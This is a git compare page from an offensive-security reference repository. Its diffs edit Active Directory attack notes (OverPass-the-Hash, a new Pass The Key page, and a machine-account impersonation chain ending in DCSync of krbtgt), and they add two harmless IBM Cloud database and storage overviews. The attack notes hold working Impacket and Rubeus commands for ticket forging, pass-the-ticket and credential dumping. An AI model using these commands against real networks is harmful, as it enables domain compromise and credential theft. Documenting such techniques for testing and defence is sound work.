Compare commits

...

4 Commits

Author SHA1 Message Date
Nidhi Shinde df832cc3db
Merge c8e78f4c82 into d603ecc3b8 2024-10-30 13:06:34 +01:00
Swissky d603ecc3b8 Pass The Key 2024-10-27 15:29:34 +01:00
Nidhi Shinde c8e78f4c82
Create ibm-cloud-object-storage.md 2024-10-08 02:45:19 +05:30
Nidhi Shinde 7ffd929ec1
Create ibm-cloud-databases.md 2024-10-08 02:29:56 +05:30
5 changed files with 298 additions and 9 deletions

View File

@ -32,7 +32,7 @@
``` ```
1. Clear the controlled machine account `servicePrincipalName` attribute 1. Clear the controlled machine account `servicePrincipalName` attribute
```ps1 ```ps1
impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController krbrelayx@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
powershell@windows> . .\Powerview.ps1 powershell@windows> . .\Powerview.ps1
powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose
@ -63,7 +63,10 @@
cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT] cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT]
``` ```
6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'` 6. DCSync
```ps1
KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
```
Automated exploitation: Automated exploitation:

View File

@ -1,6 +1,6 @@
# Hash - OverPass-the-Hash # Hash - OverPass-the-Hash
In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). > In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT).
### Using impacket ### Using impacket
@ -10,9 +10,6 @@ root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ro
root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache" root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache"
root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass
# also with the AES Key if you have it
root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5 root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
root@kali:~$ klist root@kali:~$ klist
@ -26,9 +23,6 @@ root@kali:~$ klist
# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs # NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt
# More stealthy variant, but requires the AES256 hash
.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt
# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation) # Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
``` ```

View File

@ -0,0 +1,57 @@
# Hash - Pass The Key
Pass The Key allows attackers to gain access to systems by using a valid session key instead of the user's password or NTLM hash. This technique is related to other credential-based attacks like Pass The Hash (PTH) and Pass The Ticket (PTT) but specifically uses session keys to authenticate.
Pre-authentication requires the requesting user to provide a secret key, which is derived from their password and may use encryption algorithms such as DES, RC4, AES128, or AES256.
* **RC4**: ARCFOUR-HMAC-MD5 (23), in this format, this is the NTLM hash, go to **Pass The Hash** to use it directly and **Over Pass The Hash** page to request a TGT from it.
* **DES**: DES3-CBC-SHA1 (16), should not be used anymore and have been deprecated since 2018 ([RFC 8429](https://www.rfc-editor.org/rfc/rfc8429)).
* **AES128**: AES128-CTS-HMAC-SHA1-96 (17), both AES encryption algorithms can be used with Impacket and Rubeus tools.
* **AES256**: AES256-CTS-HMAC-SHA1-96 (18)
In the past, there were more encryptions methods, that have now been deprecated.
| enctype | weak?| krb5 | Windows |
| -------------------------- | ---- | ------ | ------- |
| des-cbc-crc | weak | <1.18 | >=2000 |
| des-cbc-md4 | weak | <1.18 | ? |
| des-cbc-md5 | weak | <1.18 | >=2000 |
| des3-cbc-sha1 | | >=1.1 | none |
| arcfour-hmac | | >=1.3 | >=2000 |
| arcfour-hmac-exp | weak | >=1.3 | >=2000 |
| aes128-cts-hmac-sha1-96 | | >=1.3 | >=Vista |
| aes256-cts-hmac-sha1-96 | | >=1.3 | >=Vista |
| aes128-cts-hmac-sha256-128 | | >=1.15 | none |
| aes256-cts-hmac-sha384-192 | | >=1.15 | none |
| camellia128-cts-cmac | | >=1.9 | none |
| camellia256-cts-cmac | | >=1.9 | none |
Microsoft Windows releases Windows 7 and later disable single-DES enctypes by default.
Either use the AES key to generate a ticket with `ticketer`, or request a new TGT using `getTGT.py` script from Impacket.
## Generate a new ticket
* [fortra/impacket/ticketer.py](https://github.com/fortra/impacket/blob/master/examples/ticketer.py)
```powershell
impacket-ticketer -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 -domain lab.local Administrator -domain-sid S-1-5-21-2218639424-46377867-3078535060
```
## Request a TGT
* [fortra/impacket/getTGT.py](https://github.com/fortra/impacket/blob/master/examples/getTGT.py)
```powershell
impacket-getTGT -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 lab.local
```
* [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)
```powershell
.\Rubeus.exe asktgt /user:Administrator /aes128 bc09f84dcb4eabccb981a9f265035a72 /ptt
.\Rubeus.exe asktgt /user:Administrator /aes256:2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 /opsec /ptt
```
## References
* [MIT Kerberos Documentation - Encryption types](https://web.mit.edu/kerberos/krb5-1.18/doc/admin/enctypes.html)

View File

@ -0,0 +1,129 @@
# IBM Cloud Managed Database Services
IBM Cloud offers a variety of managed database services that allow organizations to easily deploy, manage, and scale databases without the operational overhead. These services ensure high availability, security, and performance, catering to a wide range of application requirements.
## Supported Database Engines
### 1. PostgreSQL
- **Description**: PostgreSQL is an open-source relational database known for its robustness, extensibility, and SQL compliance. It supports advanced data types and offers features like complex queries, ACID compliance, and full-text search.
- **Key Features**:
- Automated backups and recovery
- High availability with clustering options
- Scale horizontally and vertically with ease
- Support for JSON and unstructured data
- Advanced security features including encryption
- **Use Cases**:
- Web applications
- Data analytics
- Geospatial data applications
- E-commerce platforms
#### Connecting to PostgreSQL
You can connect to a PostgreSQL database using various programming languages. Here's an example in Python using the `psycopg2` library.
```python
import psycopg2
# Establishing a connection to the PostgreSQL database
conn = psycopg2.connect(
dbname="your_database_name",
user="your_username",
password="your_password",
host="your_host",
port="your_port"
)
cursor = conn.cursor()
# Example of a simple query
cursor.execute("SELECT * FROM your_table;")
records = cursor.fetchall()
print(records)
# Closing the connection
cursor.close()
conn.close()
```
### 2. MongoDB
- **Description**: MongoDB is a leading NoSQL database that provides a flexible data model, enabling developers to work with unstructured data and large volumes of data. It uses a document-oriented data model and is designed for scalability and performance.
- **Key Features**:
- Automatic sharding for horizontal scaling
- Built-in replication for high availability
- Rich querying capabilities and indexing options
- Full-text search and aggregation framework
- Flexible schema design
- **Use Cases**:
- Content management systems
- Real-time analytics
- Internet of Things (IoT) applications
- Mobile applications
#### Connecting to MongoDB
You can connect to MongoDB using various programming languages. Here's an example in JavaScript using the mongodb library.
```javascript
const { MongoClient } = require('mongodb');
// Connection URI
const uri = "mongodb://your_username:your_password@your_host:your_port/your_database";
// Create a new MongoClient
const client = new MongoClient(uri);
async function run() {
try {
// Connect to the MongoDB cluster
await client.connect();
// Access the database
const database = client.db('your_database');
const collection = database.collection('your_collection');
// Example of a simple query
const query = { name: "John Doe" };
const user = await collection.findOne(query);
console.log(user);
} finally {
// Ensures that the client will close when you finish/error
await client.close();
}
}
run().catch(console.dir);
```
## Benefits of Using IBM Cloud Managed Database Services
- **Automated Management**: Reduce operational overhead with automated backups, scaling, and updates.
- **High Availability**: Built-in redundancy and failover mechanisms ensure uptime and data availability.
- **Security**: Comprehensive security features protect your data with encryption, access controls, and compliance support.
- **Scalability**: Easily scale your database resources up or down based on application needs.
- **Performance Monitoring**: Built-in monitoring and alerting tools provide insights into database performance and health.
## Getting Started
To begin using IBM Cloud Managed Database services, follow these steps:
1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
2. **Select Database Service**: Choose the managed database service you need (PostgreSQL, MongoDB, etc.).
3. **Configure Your Database**: Set up your database parameters, including region, storage size, and instance type.
4. **Deploy**: Launch your database instance with a few clicks.
5. **Connect**: Use the provided connection string to connect your applications to the database.
## Conclusion
IBM Cloud's managed database services provide a reliable and efficient way to manage your database needs. With support for leading databases like PostgreSQL and MongoDB, organizations can focus on building innovative applications while leveraging IBM's infrastructure and expertise.
## Additional Resources
- [IBM Cloud Databases Documentation](https://cloud.ibm.com/docs/databases?code=cloud)
- [IBM Cloud PostgreSQL Documentation](https://cloud.ibm.com/docs/databases?code=postgres)
- [IBM Cloud MongoDB Documentation](https://cloud.ibm.com/docs/databases?code=mongo)

View File

@ -0,0 +1,106 @@
# IBM Cloud Object Storage
IBM Cloud Object Storage is a highly scalable, secure, and durable cloud storage service designed for storing and accessing unstructured data like images, videos, backups, and documents. With the ability to scale seamlessly based on the data volume, IBM Cloud Object Storage is ideal for handling large-scale data storage needs, such as archiving, backup, and modern applications like AI and machine learning workloads.
## Key Features
### 1. **Scalability**
- **Dynamic Scaling**: IBM Cloud Object Storage can grow dynamically with your data needs, ensuring you never run out of storage space. Theres no need for pre-provisioning or capacity planning, as it scales automatically based on demand.
- **No Size Limits**: Store an unlimited amount of data, from kilobytes to petabytes, without constraints.
### 2. **High Durability and Availability**
- **Redundancy**: Data is automatically distributed across multiple regions and availability zones to ensure that it remains available and protected, even in the event of failures.
- **99.999999999% Durability (11 nines)**: IBM Cloud Object Storage provides enterprise-grade durability, meaning that your data is safe and recoverable.
### 3. **Flexible Storage Classes**
IBM Cloud Object Storage offers multiple storage classes, allowing you to choose the right balance between performance and cost:
- **Standard**: For frequently accessed data, providing high performance and low latency.
- **Vault**: For infrequently accessed data with lower storage costs.
- **Cold Vault**: For long-term storage of rarely accessed data, such as archives.
- **Smart Tier**: Automatically optimizes storage costs by tiering objects based on access patterns.
### 4. **Secure and Compliant**
- **Encryption**: Data is encrypted at rest and in transit using robust encryption standards.
- **Access Controls**: Fine-grained access policies using IBM Identity and Access Management (IAM) allow you to control who can access your data.
- **Compliance**: Meets a wide range of industry standards and regulatory requirements, including GDPR, HIPAA, and ISO certifications.
### 5. **Cost-Effective**
- **Pay-as-You-Go**: With IBM Cloud Object Storage, you only pay for the storage and features you use, making it cost-effective for a variety of workloads.
- **Data Lifecycle Policies**: Automate data movement between storage classes to optimize costs over time based on data access patterns.
### 6. **Global Accessibility**
- **Multi-Regional Replication**: Distribute your data across multiple regions for greater accessibility and redundancy.
- **Low Latency**: Access your data with minimal latency, no matter where your users or applications are located globally.
### 7. **Integration with IBM Cloud Services**
IBM Cloud Object Storage integrates seamlessly with a wide range of IBM Cloud services, including:
- **IBM Watson AI**: Store and manage data used in AI and machine learning workloads.
- **IBM Cloud Functions**: Use serverless computing to trigger actions when new objects are uploaded.
- **IBM Kubernetes Service**: Persistent storage for containers and microservices applications.
## Use Cases
1. **Backup and Archiving**:
- IBM Cloud Object Storage is ideal for long-term storage of backups and archived data due to its durability and cost-efficient pricing models. Data lifecycle policies automate the movement of less-frequently accessed data to lower-cost storage classes like Vault and Cold Vault.
2. **Content Delivery**:
- Serve media files like images, videos, and documents to global users with minimal latency using IBM Cloud Object Storages multi-regional replication and global accessibility.
3. **Big Data and Analytics**:
- Store large datasets and logs for analytics applications. IBM Cloud Object Storage can handle vast amounts of data, which can be processed using IBM analytics services or machine learning models.
4. **Disaster Recovery**:
- Ensure business continuity by storing critical data redundantly across multiple locations, allowing you to recover from disasters or data loss events.
5. **AI and Machine Learning**:
- Store and manage training datasets for machine learning and AI applications. IBM Cloud Object Storage integrates directly with IBM Watson and other AI services, providing scalable storage for vast datasets.
## Code Example: Uploading and Retrieving Data
Heres an example using Python and the IBM Cloud SDK to upload and retrieve an object from IBM Cloud Object Storage.
### 1. **Installation**:
Install the IBM Cloud Object Storage SDK for Python:
```bash
pip install ibm-cos-sdk
```
### 2. **Uploading an Object**:
```python
import ibm_boto3
from ibm_botocore.client import Config
# Initialize the client
cos = ibm_boto3.client('s3',
ibm_api_key_id='your_api_key',
ibm_service_instance_id='your_service_instance_id',
config=Config(signature_version='oauth'),
endpoint_url='https://s3.us.cloud-object-storage.appdomain.cloud')
# Upload a file
cos.upload_file(Filename='example.txt', Bucket='your_bucket_name', Key='example.txt')
print('File uploaded successfully.')
```
### 3. **Retrieving an Object**:
```python
# Download an object
cos.download_file(Bucket='your_bucket_name', Key='example.txt', Filename='downloaded_example.txt')
print('File downloaded successfully.')
```
### Configuring IBM Cloud Object Storage
To start using IBM Cloud Object Storage, follow these steps:
1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
2. **Create Object Storage**: In the IBM Cloud console, navigate to **Catalog** > **Storage** > **Object Storage**, and follow the steps to create an instance.
3. **Create Buckets**: After creating an instance, you can create storage containers (buckets) to store your objects. Buckets are where data is logically stored.
4. **Manage Access**: Define access policies using IBM IAM for your Object Storage buckets.
5. **Connect and Use**: Use the provided API keys and endpoints to connect to your Object Storage instance and manage your data.
## Conclusion
IBM Cloud Object Storage offers a highly scalable, durable, and cost-effective storage solution for various types of workloads, from simple backups to complex AI and big data applications. With features like lifecycle management, security, and integration with other IBM Cloud services, its a flexible choice for any organization looking to manage unstructured data efficiently.